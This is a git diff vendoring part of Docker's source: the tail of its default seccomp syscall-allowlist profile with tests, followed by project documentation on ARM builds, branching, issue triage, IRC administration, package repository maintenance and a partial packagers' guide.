+				"lstat64",
+				"madvise",
+				"memfd_create",
+				"mincore",
+				"mkdir",
+				"mkdirat",
+				"mknod",
+				"mknodat",
+				"mlock",
+				"mlock2",
+				"mlockall",
+				"mmap",
+				"mmap2",
+				"mprotect",
+				"mq_getsetattr",
+				"mq_notify",
+				"mq_open",
+				"mq_timedreceive",
+				"mq_timedsend",
+				"mq_unlink",
+				"mremap",
+				"msgctl",
+				"msgget",
+				"msgrcv",
+				"msgsnd",
+				"msync",
+				"munlock",
+				"munlockall",
+				"munmap",
+				"nanosleep",
+				"newfstatat",
+				"_newselect",
+				"open",
+				"openat",
+				"pause",
+				"pipe",
+				"pipe2",
+				"poll",
+				"ppoll",
+				"prctl",
+				"pread64",
+				"preadv",
+				"prlimit64",
+				"pselect6",
+				"pwrite64",
+				"pwritev",
+				"read",
+				"readahead",
+				"readlink",
+				"readlinkat",
+				"readv",
+				"recv",
+				"recvfrom",
+				"recvmmsg",
+				"recvmsg",
+				"remap_file_pages",
+				"removexattr",
+				"rename",
+				"renameat",
+				"renameat2",
+				"restart_syscall",
+				"rmdir",
+				"rt_sigaction",
+				"rt_sigpending",
+				"rt_sigprocmask",
+				"rt_sigqueueinfo",
+				"rt_sigreturn",
+				"rt_sigsuspend",
+				"rt_sigtimedwait",
+				"rt_tgsigqueueinfo",
+				"sched_getaffinity",
+				"sched_getattr",
+				"sched_getparam",
+				"sched_get_priority_max",
+				"sched_get_priority_min",
+				"sched_getscheduler",
+				"sched_rr_get_interval",
+				"sched_setaffinity",
+				"sched_setattr",
+				"sched_setparam",
+				"sched_setscheduler",
+				"sched_yield",
+				"seccomp",
+				"select",
+				"semctl",
+				"semget",
+				"semop",
+				"semtimedop",
+				"send",
+				"sendfile",
+				"sendfile64",
+				"sendmmsg",
+				"sendmsg",
+				"sendto",
+				"setfsgid",
+				"setfsgid32",
+				"setfsuid",
+				"setfsuid32",
+				"setgid",
+				"setgid32",
+				"setgroups",
+				"setgroups32",
+				"setitimer",
+				"setpgid",
+				"setpriority",
+				"setregid",
+				"setregid32",
+				"setresgid",
+				"setresgid32",
+				"setresuid",
+				"setresuid32",
+				"setreuid",
+				"setreuid32",
+				"setrlimit",
+				"set_robust_list",
+				"setsid",
+				"setsockopt",
+				"set_thread_area",
+				"set_tid_address",
+				"setuid",
+				"setuid32",
+				"setxattr",
+				"shmat",
+				"shmctl",
+				"shmdt",
+				"shmget",
+				"shutdown",
+				"sigaltstack",
+				"signalfd",
+				"signalfd4",
+				"sigreturn",
+				"socket",
+				"socketcall",
+				"socketpair",
+				"splice",
+				"stat",
+				"stat64",
+				"statfs",
+				"statfs64",
+				"symlink",
+				"symlinkat",
+				"sync",
+				"sync_file_range",
+				"syncfs",
+				"sysinfo",
+				"syslog",
+				"tee",
+				"tgkill",
+				"time",
+				"timer_create",
+				"timer_delete",
+				"timerfd_create",
+				"timerfd_gettime",
+				"timerfd_settime",
+				"timer_getoverrun",
+				"timer_gettime",
+				"timer_settime",
+				"times",
+				"tkill",
+				"truncate",
+				"truncate64",
+				"ugetrlimit",
+				"umask",
+				"uname",
+				"unlink",
+				"unlinkat",
+				"utime",
+				"utimensat",
+				"utimes",
+				"vfork",
+				"vmsplice",
+				"wait4",
+				"waitid",
+				"waitpid",
+				"write",
+				"writev",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+		},
+		{
+			Names:  []string{"personality"},
+			Action: types.ActAllow,
+			Args: []*types.Arg{
+				{
+					Index: 0,
+					Value: 0x0,
+					Op:    types.OpEqualTo,
+				},
+			},
+		},
+		{
+			Names:  []string{"personality"},
+			Action: types.ActAllow,
+			Args: []*types.Arg{
+				{
+					Index: 0,
+					Value: 0x0008,
+					Op:    types.OpEqualTo,
+				},
+			},
+		},
+		{
+			Names:  []string{"personality"},
+			Action: types.ActAllow,
+			Args: []*types.Arg{
+				{
+					Index: 0,
+					Value: 0xffffffff,
+					Op:    types.OpEqualTo,
+				},
+			},
+		},
+		{
+			Names: []string{
+				"arm_fadvise64_64",
+				"arm_sync_file_range",
+				"breakpoint",
+				"cacheflush",
+				"set_tls",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Arches: []string{"arm", "arm64"},
+			},
+		},
+		{
+			Names: []string{
+				"arch_prctl",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Arches: []string{"amd64", "x32"},
+			},
+		},
+		{
+			Names: []string{
+				"modify_ldt",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Arches: []string{"amd64", "x32", "x86"},
+			},
+		},
+		{
+			Names: []string{
+				"s390_pci_mmio_read",
+				"s390_pci_mmio_write",
+				"s390_runtime_instr",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Arches: []string{"s390", "s390x"},
+			},
+		},
+		{
+			Names: []string{
+				"open_by_handle_at",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Caps: []string{"CAP_DAC_READ_SEARCH"},
+			},
+		},
+		{
+			Names: []string{
+				"bpf",
+				"clone",
+				"fanotify_init",
+				"lookup_dcookie",
+				"mount",
+				"name_to_handle_at",
+				"perf_event_open",
+				"setdomainname",
+				"sethostname",
+				"setns",
+				"umount",
+				"umount2",
+				"unshare",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Caps: []string{"CAP_SYS_ADMIN"},
+			},
+		},
+		{
+			Names: []string{
+				"clone",
+			},
+			Action: types.ActAllow,
+			Args: []*types.Arg{
+				{
+					Index:    0,
+					Value:    syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET,
+					ValueTwo: 0,
+					Op:       types.OpMaskedEqual,
+				},
+			},
+			Excludes: types.Filter{
+				Caps:   []string{"CAP_SYS_ADMIN"},
+				Arches: []string{"s390", "s390x"},
+			},
+		},
+		{
+			Names: []string{
+				"clone",
+			},
+			Action: types.ActAllow,
+			Args: []*types.Arg{
+				{
+					Index:    1,
+					Value:    syscall.CLONE_NEWNS | syscall.CLONE_NEWUTS | syscall.CLONE_NEWIPC | syscall.CLONE_NEWUSER | syscall.CLONE_NEWPID | syscall.CLONE_NEWNET,
+					ValueTwo: 0,
+					Op:       types.OpMaskedEqual,
+				},
+			},
+			Comment: "s390 parameter ordering for clone is different",
+			Includes: types.Filter{
+				Arches: []string{"s390", "s390x"},
+			},
+			Excludes: types.Filter{
+				Caps: []string{"CAP_SYS_ADMIN"},
+			},
+		},
+		{
+			Names: []string{
+				"reboot",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Caps: []string{"CAP_SYS_BOOT"},
+			},
+		},
+		{
+			Names: []string{
+				"chroot",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Caps: []string{"CAP_SYS_CHROOT"},
+			},
+		},
+		{
+			Names: []string{
+				"delete_module",
+				"init_module",
+				"finit_module",
+				"query_module",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Caps: []string{"CAP_SYS_MODULE"},
+			},
+		},
+		{
+			Names: []string{
+				"acct",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Caps: []string{"CAP_SYS_PACCT"},
+			},
+		},
+		{
+			Names: []string{
+				"kcmp",
+				"process_vm_readv",
+				"process_vm_writev",
+				"ptrace",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Caps: []string{"CAP_SYS_PTRACE"},
+			},
+		},
+		{
+			Names: []string{
+				"iopl",
+				"ioperm",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Caps: []string{"CAP_SYS_RAWIO"},
+			},
+		},
+		{
+			Names: []string{
+				"settimeofday",
+				"stime",
+				"adjtimex",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Caps: []string{"CAP_SYS_TIME"},
+			},
+		},
+		{
+			Names: []string{
+				"vhangup",
+			},
+			Action: types.ActAllow,
+			Args:   []*types.Arg{},
+			Includes: types.Filter{
+				Caps: []string{"CAP_SYS_TTY_CONFIG"},
+			},
+		},
+	}
+
+	return &types.Seccomp{
+		DefaultAction: types.ActErrno,
+		ArchMap:       arches(),
+		Syscalls:      syscalls,
+	}
+}
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go
new file mode 100644
index 0000000000..134692147b
--- /dev/null
+++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_test.go
@@ -0,0 +1,32 @@
+// +build linux
+
+package seccomp
+
+import (
+	"io/ioutil"
+	"testing"
+
+	"github.com/docker/docker/oci"
+)
+
+func TestLoadProfile(t *testing.T) {
+	f, err := ioutil.ReadFile("fixtures/example.json")
+	if err != nil {
+		t.Fatal(err)
+	}
+	rs := oci.DefaultSpec()
+	if _, err := LoadProfile(string(f), &rs); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestLoadDefaultProfile(t *testing.T) {
+	f, err := ioutil.ReadFile("default.json")
+	if err != nil {
+		t.Fatal(err)
+	}
+	rs := oci.DefaultSpec()
+	if _, err := LoadProfile(string(f), &rs); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go
new file mode 100644
index 0000000000..f84b20b6d9
--- /dev/null
+++ b/vendor/github.com/docker/docker/profiles/seccomp/seccomp_unsupported.go
@@ -0,0 +1,13 @@
+// +build linux,!seccomp
+
+package seccomp
+
+import (
+	"github.com/docker/docker/api/types"
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// DefaultProfile returns a nil pointer on unsupported systems.
+func DefaultProfile(rs *specs.Spec) *types.Seccomp {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/project/ARM.md b/vendor/github.com/docker/docker/project/ARM.md
new file mode 100644
index 0000000000..c4d21bf27a
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/ARM.md
@@ -0,0 +1,45 @@
+# ARM support
+
+The ARM support should be considered experimental. It will be extended step by step in the coming weeks.
+
+Building a Docker Development Image works in the same fashion as for Intel platform (x86-64).
+Currently we have initial support for 32bit ARMv7 devices.
+
+To work with the Docker Development Image you have to clone the Docker/Docker repo on a supported device.
+It needs to have a Docker Engine installed to build the Docker Development Image.
+
+From the root of the Docker/Docker repo one can use make to execute the following make targets:
+- make validate
+- make binary
+- make build
+- make deb
+- make bundles
+- make default
+- make shell
+- make test-unit
+- make test-integration-cli
+- make
+
+The Makefile does include logic to determine on which OS and architecture the Docker Development Image is built.
+Based on OS and architecture it chooses the correct Dockerfile.
+For the ARM 32bit architecture it uses `Dockerfile.armhf`.
+
+So for example in order to build a Docker binary one has to  
+1. clone the Docker/Docker repository on an ARM device `git clone git@github.com:docker/docker.git`  
+2. change into the checked out repository with `cd docker`  
+3. execute `make binary` to create a Docker Engine binary for ARM  
+
+## Kernel modules
+A few libnetwork integration tests require that the kernel be
+configured with "dummy" network interface and has the module
+loaded. However, the dummy module may be not loaded automatically.
+
+To load the kernel module permanently, run these commands as `root`.
+
+    modprobe dummy
+    echo "dummy" >> /etc/modules
+
+On some systems you also have to sync your kernel modules.
+
+    oc-sync-kernel-modules
+    depmod
diff --git a/vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md b/vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md
new file mode 100644
index 0000000000..1c6f232524
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/BRANCHES-AND-TAGS.md
@@ -0,0 +1,35 @@
+Branches and tags
+=================
+
+Note: details of the release process for the Engine are documented in the
+[RELEASE-CHECKLIST](https://github.com/docker/docker/blob/master/project/RELEASE-CHECKLIST.md).
+
+# Branches
+
+The docker/docker repository should normally have only three living branches at all time, including
+the regular `master` branch:
+
+## `docs` branch
+
+The `docs` branch supports documentation updates between product releases. This branch allow us to
+decouple documentation releases from product releases.
+
+## `release` branch
+
+The `release` branch contains the last _released_ version of the code for the project.
+
+The `release` branch is only updated at each public release of the project. The mechanism for this
+is that the release is materialized by a pull request against the `release` branch which lives for
+the duration of the code freeze period. When this pull request is merged, the `release` branch gets
+updated, and its new state is tagged accordingly.
+
+# Tags
+
+Any public release of a compiled binary, with the logical exception of nightly builds, should have
+a corresponding tag in the repository.
+
+The general format of a tag is `vX.Y.Z[-suffix[N]]`:
+
+- All of `X`, `Y`, `Z` must be specified (example: `v1.0.0`)
+- First release candidate for version `1.8.0` should be tagged `v1.8.0-rc1`
+- Second alpha release of a product should be tagged `v1.0.0-alpha1`
diff --git a/vendor/github.com/docker/docker/project/CONTRIBUTORS.md b/vendor/github.com/docker/docker/project/CONTRIBUTORS.md
new file mode 120000
index 0000000000..44fcc63439
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/CONTRIBUTORS.md
@@ -0,0 +1 @@
+../CONTRIBUTING.md
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/project/GOVERNANCE.md b/vendor/github.com/docker/docker/project/GOVERNANCE.md
new file mode 100644
index 0000000000..6ae7baf743
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/GOVERNANCE.md
@@ -0,0 +1,17 @@
+# Docker Governance Advisory Board Meetings
+
+In the spirit of openness, Docker created a Governance Advisory Board, and committed to make all materials and notes from the meetings of this group public.
+All output from the meetings should be considered proposals only, and are subject to the review and approval of the community and the project leadership.
+
+The materials from the first Docker Governance Advisory Board meeting, held on October 28, 2014, are available at 
+[Google Docs Folder](https://goo.gl/Alfj8r)
+
+These include:
+
+* First Meeting Notes 
+* DGAB Charter 
+* Presentation 1: Introductory Presentation, including State of The Project  
+* Presentation 2: Overall Contribution Structure/Docker Project Core Proposal 
+* Presentation 3: Long Term Roadmap/Statement of Direction 
+ 
+
diff --git a/vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md b/vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md
new file mode 100644
index 0000000000..824a14bd51
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/IRC-ADMINISTRATION.md
@@ -0,0 +1,37 @@
+# Freenode IRC Administration Guidelines and Tips
+
+This is not meant to be a general "Here's how to IRC" document, so if you're
+looking for that, check Google instead. ♥
+
+If you've been charged with helping maintain one of Docker's now many IRC
+channels, this might turn out to be useful.  If there's information that you
+wish you'd known about how a particular channel is organized, you should add
+deets here! :)
+
+## `ChanServ`
+
+Most channel maintenance happens by talking to Freenode's `ChanServ` bot.  For
+example, `/msg ChanServ ACCESS <channel> LIST` will show you a list of everyone
+with "access" privileges for a particular channel.
+
+A similar command is used to give someone a particular access level.  For
+example, to add a new maintainer to the `#docker-maintainers` access list so
+that they can contribute to the discussions (after they've been merged
+appropriately in a `MAINTAINERS` file, of course), one would use `/msg ChanServ
+ACCESS #docker-maintainers ADD <nick> maintainer`.
+
+To setup a new channel with a similar `maintainer` access template, use a
+command like `/msg ChanServ TEMPLATE <channel> maintainer +AV` (`+A` for letting
+them view the `ACCESS LIST`, `+V` for auto-voice; see `/msg ChanServ HELP FLAGS`
+for more details).
+
+## Troubleshooting
+
+The most common cause of not-getting-auto-`+v` woes is people not being
+`IDENTIFY`ed with `NickServ` (or their current nickname not being `GROUP`ed with
+their main nickname) -- often manifested by `ChanServ` responding to an `ACCESS
+ADD` request with something like `xyz is not registered.`.
+
+This is easily fixed by doing `/msg NickServ IDENTIFY OldNick SecretPassword`
+followed by `/msg NickServ GROUP` to group the two nicknames together.  See
+`/msg NickServ HELP GROUP` for more information.
diff --git a/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md
new file mode 100644
index 0000000000..95cb2f1b95
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/ISSUE-TRIAGE.md
@@ -0,0 +1,132 @@
+Triaging of issues
+------------------
+
+Triage provides an important way to contribute to an open source project.  Triage helps ensure issues resolve quickly by:
+
+- Describing the issue's intent and purpose is conveyed precisely. This is necessary because it can be difficult for an issue to explain how an end user experiences a problem and what actions they took.
+- Giving a contributor the information they need before they commit to resolving an issue.
+- Lowering the issue count by preventing duplicate issues.
+- Streamlining the development process by preventing duplicate discussions.
+
+If you don't have time to code, consider helping with triage. The community will thank you for saving them time by spending some of yours.
+
+### 1. Ensure the issue contains basic information
+
+Before triaging an issue very far, make sure that the issue's author provided the standard issue information. This will help you make an educated recommendation on how this to categorize the issue. Standard information that *must* be included in most issues are things such as:
+
+-   the output of `docker version`
+-   the output of `docker info`
+-   the output of `uname -a`
+-   a reproducible case if this is a bug, Dockerfiles FTW
+-   host distribution and version ( ubuntu 14.04, RHEL, fedora 23 )
+-   page URL if this is a docs issue or the name of a man page
+
+Depending on the issue, you might not feel all this information is needed. Use your best judgement.  If you cannot triage an issue using what its author provided, explain kindly to the author that they must provide the above information to clarify the problem.
+
+If the author provides the standard information but you are still unable to triage the issue, request additional information. Do this kindly and politely because you are asking for more of the author's time.
+
+If the author does not respond requested information within the timespan of a week, close the issue with a kind note stating that the author can request for the issue to be
+reopened when the necessary information is provided.
+
+### 2. Classify the Issue
+
+An issue can have multiple of the following labels. Typically, a properly classified issues should
+have:
+
+- One label identifying its kind (`kind/*`).
+- One or multiple labels identifying the functional areas of interest (`area/*`).
+- Where applicable, one label categorizing its difficulty (`exp/*`).
+
+#### Issue kind
+
+| Kind             | Description                                                                                                                     |
+|------------------|---------------------------------------------------------------------------------------------------------------------------------|
+| kind/bug         | Bugs are bugs. The cause may or may not be known at triage time so debugging should be taken account into the time estimate.    |
+| kind/enhancement | Enhancement are not bugs or new features but can drastically improve usability or performance of a project component.           |
+| kind/feature     | Functionality or other elements that the project does not currently support.  Features are new and shiny.                       |
+| kind/question    | Contains a user or contributor question requiring a response.                                                                   |
+
+#### Functional area
+
+| Area                      |
+|---------------------------|
+| area/api                  |
+| area/builder              |
+| area/bundles              |
+| area/cli                  |
+| area/daemon               |
+| area/distribution         |
+| area/docs                 |
+| area/kernel               |
+| area/logging              |
+| area/networking           |
+| area/plugins              |
+| area/project              |
+| area/runtime              |
+| area/security             |
+| area/security/apparmor    |
+| area/security/seccomp     |
+| area/security/selinux     |
+| area/security/trust       |
+| area/storage              |
+| area/storage/aufs         |
+| area/storage/btrfs        |
+| area/storage/devicemapper |
+| area/storage/overlay      |
+| area/storage/zfs          |
+| area/swarm                |
+| area/testing              |
+| area/volumes              |
+
+#### Platform
+
+| Platform                  |
+|---------------------------|
+| platform/arm              |
+| platform/darwin           |
+| platform/ibm-power        |
+| platform/ibm-z            |
+| platform/windows          |
+
+#### Experience level
+
+Experience level is a way for a contributor to find an issue based on their
+skill set.  Experience types are applied to the issue or pull request using
+labels.
+
+| Level            | Experience level guideline                                                                                                                                                  |
+|------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
+| exp/beginner     | New to Docker, and possibly Golang, and is looking to help while learning the basics.                                                                                       |
+| exp/intermediate | Comfortable with golang and understands the core concepts of Docker and looking to dive deeper into the project.                                                            |
+| exp/expert       | Proficient with Docker and Golang and has been following, and active in, the community to understand the rationale behind design decisions and where the project is headed. |
+
+As the table states, these labels are meant as guidelines. You might have
+written a whole plugin for Docker in a personal project and never contributed to
+Docker. With that kind of experience, you could take on an <strong
+class="gh-label expert">exp/expert</strong> level task.
+
+#### Triage status
+
+To communicate the triage status with other collaborators, you can apply status
+labels to issues. These labels prevent duplicating effort.
+
+| Status                        | Description                                                                                                                                                                 |
+|-------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
+| status/confirmed              | You triaged the issue, and were able to reproduce the issue. Always leave a comment how you reproduced, so that the person working on resolving the issue has a way to set up a test-case.
+| status/accepted               | Apply to enhancements / feature requests that we think are good to have. Adding this label helps contributors find things to work on.
+| status/more-info-needed       | Apply this to issues that are missing information (e.g. no `docker version` or `docker info` output, or no steps to reproduce), or require feedback from the reporter. If the issue is not updated after a week, it can generally be closed.
+| status/needs-attention        | Apply this label if an issue (or PR) needs more eyes.
+
+### 3. Prioritizing issue
+
+When, and only when, an issue is attached to a specific milestone, the issue can be labeled with the
+following labels to indicate their degree of priority (from more urgent to less urgent).
+
+| Priority    | Description                                                                                                                       |
+|-------------|-----------------------------------------------------------------------------------------------------------------------------------|
+| priority/P0 | Urgent: Security, critical bugs, blocking issues. P0 basically means drop everything you are doing until this issue is addressed. |
+| priority/P1 | Important: P1 issues are a top priority and a must-have for the next release.                                                     |
+| priority/P2 | Normal priority: default priority applied.                                                                                        |
+| priority/P3 | Best effort: those are nice to have / minor issues.                                                                               |
+
+And that's it. That should be all the information required for a new or existing contributor to come in an resolve an issue.
diff --git a/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md
new file mode 100644
index 0000000000..3763f8798b
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/PACKAGE-REPO-MAINTENANCE.md
@@ -0,0 +1,74 @@
+# Apt & Yum Repository Maintenance
+## A maintainer's guide to managing Docker's package repos
+
+### How to clean up old experimental debs and rpms
+
+We release debs and rpms for experimental nightly, so these can build up.
+To remove old experimental debs and rpms, and _ONLY_ keep the latest, follow the
+steps below.
+
+1. Checkout docker master
+
+2. Run clean scripts
+
+```bash
+docker build --rm --force-rm -t docker-dev:master .
+docker run --rm -it --privileged \
+    -v /path/to/your/repos/dir:/volumes/repos \
+    -v $HOME/.gnupg:/root/.gnupg \
+    -e GPG_PASSPHRASE \
+    -e DOCKER_RELEASE_DIR=/volumes/repos \
+    docker-dev:master hack/make.sh clean-apt-repo clean-yum-repo generate-index-listing sign-repos
+```
+
+3. Upload the changed repos to `s3` (if you host on s3)
+
+4. Purge the cache, PURGE the cache, PURGE THE CACHE!
+
+### How to get out of a sticky situation
+
+Sh\*t happens. We know. Below are steps to get out of any "hash-sum mismatch" or
+"gpg sig error" or the likes error that might happen to the apt repo.
+
+**NOTE:** These are apt repo specific, have had no experimence with anything similar
+happening to the yum repo in the past so you can rest easy.
+
+For each step listed below, move on to the next if the previous didn't work.
+Otherwise CELEBRATE!
+
+1. Purge the cache.
+
+2. Did you remember to sign the debs after releasing?
+
+Re-sign the repo with your gpg key:
+
+```bash
+docker build --rm --force-rm -t docker-dev:master .
+docker run --rm -it --privileged \
+    -v /path/to/your/repos/dir:/volumes/repos \
+    -v $HOME/.gnupg:/root/.gnupg \
+    -e GPG_PASSPHRASE \
+    -e DOCKER_RELEASE_DIR=/volumes/repos \
+    docker-dev:master hack/make.sh sign-repos
+```
+
+Upload the changed repo to `s3` (if that is where you host)
+
+PURGE THE CACHE.
+
+3. Run Jess' magical, save all, only in case of extreme emergencies, "you are
+going to have to break this glass to get it" script.
+
+```bash
+docker build --rm --force-rm -t docker-dev:master .
+docker run --rm -it --privileged \
+    -v /path/to/your/repos/dir:/volumes/repos \
+    -v $HOME/.gnupg:/root/.gnupg \
+    -e GPG_PASSPHRASE \
+    -e DOCKER_RELEASE_DIR=/volumes/repos \
+    docker-dev:master hack/make.sh update-apt-repo generate-index-listing sign-repos
+```
+
+4. Upload the changed repo to `s3` (if that is where you host)
+
+PURGE THE CACHE.
diff --git a/vendor/github.com/docker/docker/project/PACKAGERS.md b/vendor/github.com/docker/docker/project/PACKAGERS.md
new file mode 100644
index 0000000000..46ea8e7b20
--- /dev/null
+++ b/vendor/github.com/docker/docker/project/PACKAGERS.md
@@ -0,0 +1,307 @@
+# Dear Packager,
+
+If you are looking to make Docker available on your favorite software
+distribution, this document is for you. It summarizes the requirements for
+building and running the Docker client and the Docker daemon.
+
+## Getting Started
+
+We want to help you package Docker successfully. Before doing any packaging, a
+good first step is to introduce yourself on the [docker-dev mailing
+list](https://groups.google.com/d/forum/docker-dev), explain what you're trying
+to achieve, and tell us how we can help. Don't worry, we don't bite! There might
+even be someone already working on packaging for the same distro!
+
+You can also join the IRC channel - #docker and #docker-dev on Freenode are both
+active and friendly.
+
+We like to refer to Tianon ("@tianon" on GitHub and "tianon" on IRC) as our
+"Packagers Relations", since he's always working to make sure our packagers have
+a good, healthy upstream to work with (both in our communication and in our
+build scripts). If you're having any kind of trouble, feel free to ping him
+directly. He also likes to keep track of what distributions we have packagers
+for, so feel free to reach out to him even just to say "Hi!"
+
+## Package Name
+
+If possible, your package should be called "docker". If that name is already
+taken, a second choice is "docker-engine". Another possible choice is "docker.io".
+
+## Official Build vs Distro Build
+
+The Docker project maintains its own build and release toolchain. It is pretty
+neat and entirely based on Docker (surprise!). This toolchain is the canonical
+way to build Docker. We encourage you to give it a try, and if the circumstances
+allow you to use it, we recommend that you do.
+
+You might not be able to use the official build toolchain - usually because your
+distribution has a toolchain and packaging policy of its own. We get it! Your
+house, your rules. The rest of this document should give you the information you
+need to package Docker your way, without denaturing it in the process.
+
+## Build Dependencies
+
+To build Docker, you will need the following:
+
+* A recent version of Git and Mercurial
+* Go version 1.6 or later
+* A clean checkout of the source added to a valid [Go
+  workspace](https://golang.org/doc/code.html#Workspaces) under the path
+  *src/github.com/docker/docker* (unless you plan to use `AUTO_GOPATH`,
+  explained in more detail below)
+
+To build the Docker daemon, you will additionally need:
+
+* An amd64/x86_64 machine running Linux
+* SQLite version 3.7.9 or later
+* libdevmapper version 1.02.68-cvs (2012-01-26) or later from lvm2 version
+  2.02.89 or later
+* btrfs-progs version 3.16.1 or later (unless using an older version is
+  absolutely necessary, in which case 3.8 is the minimum)
+* libseccomp version 2.2.1 or later (for build tag seccomp)
+
+Be sure to also check out Docker's Dockerfile for the most up-to-date list of
+these build-time dependencies.
+
+### Go Dependencies
+
+All Go dependencies are vendored under "./vendor". They are used by the official
+build, so the source of truth for the current version of each dependency is
+whatever is in "./vendor".
+
+To use the vendored dependencies, simply make sure the path to "./vendor" is
+included in `GOPATH` (or use `AUTO_GOPATH`, as explained below).
+
+If you would rather (or must, due to distro policy) package these dependencies
+yourself, take a look at "vendor.conf" for an easy-to-parse list of the
+exact version for each.
+
+NOTE: if you're not able to package the exact version (to the exact commit) of a
+given dependency, please get in touch so we can remediate! Who knows what
+discrepancies can be caused by even the slightest deviation. We promise to do
+our best to make everybody happy.
+
+## Stripping Binaries
+
+Please, please, please do not strip any compiled binaries. This is really
+important.
+
+In our own testing, stripping the resulting binaries sometimes results in a
+binary that appears to work, but more often causes random panics, segfaults, and
+other issues. Even if the binary appears to work, please don't strip.
+
+See the following quotes from Dave Cheney, which explain this position better
+from the upstream Golang perspective.
+
+### [go issue #5855, comment #3](https://code.google.com/p/go/issues/detail?id=5855#c3)
+
+> Super super important: Do not strip go binaries or archives. It isn't tested,
+> often breaks, and doesn't work.
+
+### [launchpad golang issue #1200255, comment #8](https://bugs.launchpad.net/ubuntu/+source/golang/+bug/1200255/comments/8)
+
+> To quote myself: "Please do not strip Go binaries, it is not supported, not
+> tested, is often broken, and doesn't do what you want"
+>
+> To unpack that a bit
+>
+> * not supported, as in, we don't support it, and recommend against it when
+>   asked
+> * not tested, we don't test stripped binaries as part of the build CI process
+> * is often broken, stripping a go binary will produce anywhere from no, to
+>   subtle, to outright execution failure, see above
+
+### [launchpad golang issue #1200255, comment #13](https://bugs.launchpad.net/ubuntu/+source/golang/+bug/1200255/comments/13)
+
+> To clarify my previous statements.
+>
+> * I do not disagree with the debian policy, it is there for a good reason
+> * Having said that, it stripping Go binaries doesn't work, and nobody is
+>   looking at making it work, so there is that.
+>
+> Thanks for patching the build formula.
+
+## Building Docker
+
+Please use our build script ("./hack/make.sh") for all your compilation of
+Docker. If there's something you need that it isn't doing, or something it could
+be doing to make your life as a packager easier, please get in touch with Tianon
+and help us rectify the situation. Chances are good that other packagers have
+probably run into the same problems and a fix might already be in the works, but
+none of us will know for sure unless you harass Tianon about it. :)
+
+All the commands listed within this section should be run with the Docker source
+checkout as the current working directory.
+
+### `AUTO_GOPATH`
+
+If you'd rather not be bothered with the hassles that setting up `GOPATH`
+appropriately can be, and prefer to just get a "build that works", you should
+add something similar to this to whatever script or process you're using to
+build Docker:
+
+```bash
+export AUTO_GOPATH=1
+```
+
+This will cause the build scripts to set up a reasonable `GOPATH` that
+automatically and properly includes both docker/docker from the local
+directory, and the local "./vendor" directory as necessary.
+
+### `DOCKER_BUILDTAGS`
+
+If you're building a binary that may need to be used on platforms that include
+AppArmor, you will need to set `DOCKER_BUILDTAGS` as follows:
+```bash
+export DOCKER_BUILDTAGS='apparmor'
+```
+
+If you're building a binary that may need to be used on platforms that include
+SELinux, you will need to use the `selinux` build tag:
+```bash
+export DOCKER_BUILDTAGS='selinux'
+```
+
+If you're building a binary that may need to be used on platforms that include
+seccomp, you will need to use the `seccomp` build tag:
+```bash
+export DOCKER_BUILDTAGS='seccomp'
+```
+
+There are build tags for disabling graphdrivers as well. By default, support
+for all graphdrivers are built in.
+
+To disable btrfs:
+```bash
+export DOCKER_BUILDTAGS='exclude_graphdriver_btrfs'
+```
+
+To disable devicemapper:
+```bash
+export DOCKER_BUILDTAGS='exclude_graphdriver_devicemapper'
+```
+
+To disable aufs:
+```bash
+export DOCKER_BUILDTAGS='exclude_graphdriver_aufs'
+```
+
+NOTE: if you need to set more than one build tag, space separate them:
+```bash
+export DOCKER_BUILDTAGS='apparmor selinux exclude_graphdriver_aufs'
+```
+
+### Static Daemon
+
